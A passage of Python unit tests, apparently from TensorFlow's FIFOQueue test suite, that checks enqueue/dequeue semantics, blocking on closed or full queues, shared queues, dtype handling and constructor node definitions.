q.enqueue_many((array_ops.placeholder(dtypes_lib.int32),
array_ops.placeholder(dtypes_lib.int32)))
def testEnqueueWrongShapeAtRuntime(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, (dtypes_lib.int32, dtypes_lib.int32), (
(2, 2), (3, 3)))
elems_ok = np.array([1] * 4).reshape((2, 2)).astype(np.int32)
elems_bad = array_ops.placeholder(dtypes_lib.int32)
enqueue_op = q.enqueue((elems_ok, elems_bad))
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
r"Expected \[3,3\], got \[3,4\]"):
sess.run([enqueue_op],
feed_dict={elems_bad: np.array([1] * 12).reshape((3, 4))})
def testEnqueueDequeueManyWrongShape(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, (dtypes_lib.int32, dtypes_lib.int32), (
(2, 2), (3, 3)))
elems_ok = np.array([1] * 8).reshape((2, 2, 2)).astype(np.int32)
elems_bad = array_ops.placeholder(dtypes_lib.int32)
enqueue_op = q.enqueue_many((elems_ok, elems_bad))
dequeued_t = q.dequeue_many(2)
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Shape mismatch in tuple component 1. "
r"Expected \[2,3,3\], got \[2,3,4\]"):
sess.run([enqueue_op],
feed_dict={elems_bad: np.array([1] * 24).reshape((2, 3, 4))})
self.evaluate(dequeued_t)
def testParallelEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(1000, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
self.evaluate(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(1000, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(1000, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(101)
enqueue_op.run()
close_op.run()
# Dequeue up to 101 items in parallel on 10 threads, from closed queue.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelEnqueueAndDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(50, dtypes_lib.float32, shapes=())
initial_elements = [10.0] * 49
q.enqueue_many((initial_elements,)).run()
enqueue_op = q.enqueue((20.0,))
dequeued_t = q.dequeue()
def enqueue():
for _ in xrange(100):
self.evaluate(enqueue_op)
def dequeue():
for _ in xrange(100):
self.assertTrue(self.evaluate(dequeued_t) in (10.0, 20.0))
enqueue_threads = [self.checkedThread(target=enqueue) for _ in range(10)]
dequeue_threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for enqueue_thread in enqueue_threads:
enqueue_thread.start()
for dequeue_thread in dequeue_threads:
dequeue_thread.start()
for enqueue_thread in enqueue_threads:
enqueue_thread.join()
for dequeue_thread in dequeue_threads:
dequeue_thread.join()
# Dequeue the initial count of elements to clean up.
cleanup_elems = q.dequeue_many(49).eval()
for elem in cleanup_elems:
self.assertTrue(elem in (10.0, 20.0))
def testMixtureOfEnqueueAndEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.int32, shapes=())
enqueue_placeholder = array_ops.placeholder(dtypes_lib.int32, shape=())
enqueue_op = q.enqueue((enqueue_placeholder,))
enqueuemany_placeholder = array_ops.placeholder(
dtypes_lib.int32, shape=(None,))
enqueuemany_op = q.enqueue_many((enqueuemany_placeholder,))
dequeued_t = q.dequeue()
close_op = q.close()
def dequeue():
for i in xrange(250):
self.assertEqual(i, self.evaluate(dequeued_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
elements_enqueued = 0
while elements_enqueued < 250:
# With equal probability, run Enqueue or enqueue_many.
if random.random() > 0.5:
enqueue_op.run({enqueue_placeholder: elements_enqueued})
elements_enqueued += 1
else:
count = random.randint(0, min(20, 250 - elements_enqueued))
range_to_enqueue = np.arange(
elements_enqueued, elements_enqueued + count, dtype=np.int32)
enqueuemany_op.run({enqueuemany_placeholder: range_to_enqueue})
elements_enqueued += count
close_op.run()
dequeue_thread.join()
self.assertEqual(0, q.size().eval())
def testMixtureOfDequeueAndDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.int32, shapes=())
enqueue_op = q.enqueue_many((np.arange(250, dtype=np.int32),))
dequeued_t = q.dequeue()
count_placeholder = array_ops.placeholder(dtypes_lib.int32, shape=())
dequeuemany_t = q.dequeue_many(count_placeholder)
def enqueue():
self.evaluate(enqueue_op)
enqueue_thread = self.checkedThread(target=enqueue)
enqueue_thread.start()
elements_dequeued = 0
while elements_dequeued < 250:
# With equal probability, run Dequeue or dequeue_many.
if random.random() > 0.5:
self.assertEqual(elements_dequeued, self.evaluate(dequeued_t))
elements_dequeued += 1
else:
count = random.randint(0, min(20, 250 - elements_dequeued))
expected_range = np.arange(
elements_dequeued, elements_dequeued + count, dtype=np.int32)
self.assertAllEqual(expected_range,
dequeuemany_t.eval({
count_placeholder: count
}))
elements_dequeued += count
q.close().run()
enqueue_thread.join()
self.assertEqual(0, q.size().eval())
def testBlockingDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, ())
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertAllEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, ())
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertAllEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.FIFOQueue(100, dtypes_lib.int32, ())
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.FIFOQueue(total_count, dtypes_lib.int32, ())
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
for elem in elems:
self.assertEqual([elem], self.evaluate(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
def testBlockingDequeueFromClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def dequeue():
for elem in elems:
self.assertEqual([elem], self.evaluate(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
close_op = q.close()
dequeued_t = q.dequeue()
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueManyFromClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, ())
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems, self.evaluate(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueManyButNotAllFromClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, ())
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems[:3], self.evaluate(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, ())
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems[:3], self.evaluate(dequeued_t))
self.assertAllEqual(elems[3:], self.evaluate(dequeued_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueManyLargerThanCapacityWithConcurrentDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(4, dtypes_lib.float32, ())
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue()
def enqueue():
self.evaluate(enqueue_op)
def dequeue():
self.assertAllEqual(elems[0:3], self.evaluate(dequeued_t))
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate(dequeued_t)
self.assertEqual(elems[3], self.evaluate(cleanup_dequeue_t))
def close():
self.evaluate(close_op)
enqueue_thread = self.checkedThread(target=enqueue)
enqueue_thread.start()
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_thread = self.checkedThread(target=close)
close_thread.start()
enqueue_thread.join()
dequeue_thread.join()
close_thread.join()
def testClosedBlockingDequeueManyRestoresPartialBatch(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(4, (dtypes_lib.float32, dtypes_lib.float32), (
(), ()))
elems_a = [1.0, 2.0, 3.0]
elems_b = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems_a, elems_b))
dequeued_a_t, dequeued_b_t = q.dequeue_many(4)
cleanup_dequeue_a_t, cleanup_dequeue_b_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def dequeue():
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate([dequeued_a_t, dequeued_b_t])
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
# Test that the elements in the partially-dequeued batch are
# restored in the correct order.
for elem_a, elem_b in zip(elems_a, elems_b):
val_a, val_b = self.evaluate([cleanup_dequeue_a_t, cleanup_dequeue_b_t])
self.assertEqual(elem_a, val_a)
self.assertEqual(elem_b, val_b)
self.assertEqual(0, q.size().eval())
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, ())
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, ())
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(4, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for elem in elems:
self.assertEqual([elem], self.evaluate(dequeued_t))
self.assertEqual([50.0], self.evaluate(dequeued_t))
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(4, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for elem in elems:
self.assertEqual([elem], self.evaluate(dequeued_t))
time.sleep(0.01)
self.assertEqual([50.0], self.evaluate(dequeued_t))
self.assertEqual([60.0], self.evaluate(dequeued_t))
# Make sure the thread finishes before exiting.
thread.join()
def testBlockingEnqueueBeforeClose(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(4, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed once the dequeue op runs.
self.evaluate(blocking_enqueue_op)
enqueue_thread = self.checkedThread(target=blocking_enqueue)
enqueue_thread.start()
# The close_op should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def close():
self.evaluate(close_op)
close_thread = self.checkedThread(target=close)
close_thread.start()
# The dequeue will unblock both threads.
self.assertEqual(10.0, self.evaluate(dequeued_t))
enqueue_thread.join()
close_thread.join()
for elem in [20.0, 30.0, 40.0, 50.0]:
self.assertEqual(elem, self.evaluate(dequeued_t))
self.assertEqual(0, q.size().eval())
def testBlockingEnqueueManyBeforeClose(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(4, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
enqueue_thread = self.checkedThread(target=blocking_enqueue)
enqueue_thread.start()
# The close_op should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def close():
self.evaluate(close_op)
close_thread = self.checkedThread(target=close)
close_thread.start()
# The dequeue will unblock both threads.
self.assertEqual(10.0, self.evaluate(dequeued_t))
enqueue_thread.join()
close_thread.join()
for elem in [20.0, 30.0, 50.0, 60.0]:
self.assertEqual(elem, self.evaluate(dequeued_t))
def testDoesNotLoseValue(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(1, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
size_t = q.size()
enqueue_op.run()
for _ in range(500):
self.assertEqual(size_t.eval(), [1])
def testSharedQueueSameSession(self):
with self.cached_session():
q1 = data_flow_ops.FIFOQueue(
1, dtypes_lib.float32, shared_name="shared_queue")
q1.enqueue((10.0,)).run()
q2 = data_flow_ops.FIFOQueue(
1, dtypes_lib.float32, shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), [1])
self.assertEqual(q2_size_t.eval(), [1])
self.assertEqual(q2.dequeue().eval(), [10.0])
self.assertEqual(q1_size_t.eval(), [0])
self.assertEqual(q2_size_t.eval(), [0])
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), [1])
self.assertEqual(q2_size_t.eval(), [1])
self.assertEqual(q1.dequeue().eval(), [20.0])
self.assertEqual(q1_size_t.eval(), [0])
self.assertEqual(q2_size_t.eval(), [0])
def testIncompatibleSharedQueueErrors(self):
with self.cached_session():
q_a_1 = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, shared_name="q_a")
q_a_2 = data_flow_ops.FIFOQueue(15, dtypes_lib.float32, shared_name="q_a")
q_a_1.queue_ref.op.run()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.op.run()
q_b_1 = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, shared_name="q_b")
q_b_2 = data_flow_ops.FIFOQueue(10, dtypes_lib.int32, shared_name="q_b")
q_b_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_b_2.queue_ref.op.run()
q_c_1 = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, shared_name="q_c")
q_c_2 = data_flow_ops.FIFOQueue(
10, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_c")
q_c_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_c_2.queue_ref.op.run()
q_d_1 = data_flow_ops.FIFOQueue(
10, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_2 = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, shared_name="q_d")
q_d_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.op.run()
q_e_1 = data_flow_ops.FIFOQueue(
10, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = data_flow_ops.FIFOQueue(
10, dtypes_lib.float32, shapes=[(1, 1, 2, 4)], shared_name="q_e")
q_e_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.op.run()
q_f_1 = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, shared_name="q_f")
q_f_2 = data_flow_ops.FIFOQueue(
10, (dtypes_lib.float32, dtypes_lib.int32), shared_name="q_f")
q_f_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_f_2.queue_ref.op.run()
def testSelectQueue(self):
with self.cached_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(data_flow_ops.FIFOQueue(10, dtypes_lib.float32))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = data_flow_ops.FIFOQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.cached_session():
q1 = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
q2 = data_flow_ops.FIFOQueue(15, dtypes_lib.float32)
enq_q = data_flow_ops.FIFOQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("is not in"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_many_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_many_op)
def testResetOfBlockingOperation(self):
with self.cached_session() as sess:
q_empty = data_flow_ops.FIFOQueue(5, dtypes_lib.float32, ())
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
q_full = data_flow_ops.FIFOQueue(5, dtypes_lib.float32)
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(
self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(
self._blockingDequeueMany, args=(sess, dequeue_many_op)),
self.checkedThread(
self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(
self._blockingEnqueueMany, args=(sess, enqueue_many_op))
]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testBigEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(5, dtypes_lib.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
self.evaluate(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertAllEqual(elem, results)
def testBigDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(2, dtypes_lib.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(self.evaluate(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
self.evaluate(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertAllEqual(elem, results)
def testDtypes(self):
with self.cached_session() as sess:
dtypes = [
dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8, dtypes_lib.int64,
dtypes_lib.uint16, dtypes_lib.bool, dtypes_lib.complex64,
dtypes_lib.complex128
]
shape = (32, 4, 128)
q = data_flow_ops.FIFOQueue(32, dtypes, [shape[1:]] * len(dtypes))
input_tuple = []
for dtype in dtypes:
np_dtype = dtype.as_numpy_dtype
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes_lib.bool:
np_array = np_array > 0
elif dtype in (dtypes_lib.complex64, dtypes_lib.complex128):
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
input_tuple.append(np_array)
q.enqueue_many(input_tuple).run()
output_tuple_t = q.dequeue_many(32)
output_tuple = self.evaluate(output_tuple_t)
for (input_elem, output_elem) in zip(input_tuple, output_tuple):
self.assertAllEqual(input_elem, output_elem)
def testDequeueEnqueueFail(self):
with self.cached_session() as session:
q = data_flow_ops.FIFOQueue(10, [dtypes_lib.int32], shapes=[()])
a = q.dequeue()
b = control_flow_ops.Assert(False, ["Before enqueue"])
with ops.control_dependencies([b]):
c = q.enqueue(33)
with self.assertRaisesWithPredicateMatch(
errors_impl.InvalidArgumentError,
lambda e: "Before enqueue" in str(e)):
session.run([a, c])
class FIFOQueueDictTest(test.TestCase):
def testConstructor(self):
with ops.Graph().as_default():
q = data_flow_ops.FIFOQueue(
5, (dtypes_lib.int32, dtypes_lib.float32),
names=("i", "j"),
shared_name="foo",
name="Q")
self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
self.assertProtoEquals("""
name:'Q' op:'FIFOQueueV2'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list {} } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: 'foo' } }
""", q.queue_ref.op.node_def)
self.assertEqual(["i", "j"], q.names)
def testConstructorWithShapes(self):
with ops.Graph().as_default():
q = data_flow_ops.FIFOQueue(
5, (dtypes_lib.int32, dtypes_lib.float32),
names=("i", "f"),
shapes=(tensor_shape.TensorShape([1, 1, 2, 3]),
tensor_shape.TensorShape([5, 8])),
name="Q")
self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
self.assertProtoEquals("""
name:'Q' op:'FIFOQueueV2'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list {
shape { dim { size: 1 }
dim { size: 1 }
dim { size: 2 }
dim { size: 3 } }
shape { dim { size: 5 }
dim { size: 8 } }
} } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.queue_ref.op.node_def)
self.assertEqual(["i", "f"], q.names)
def testEnqueueDequeueOneComponent(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(
10, dtypes_lib.float32, shapes=((),), names="f")
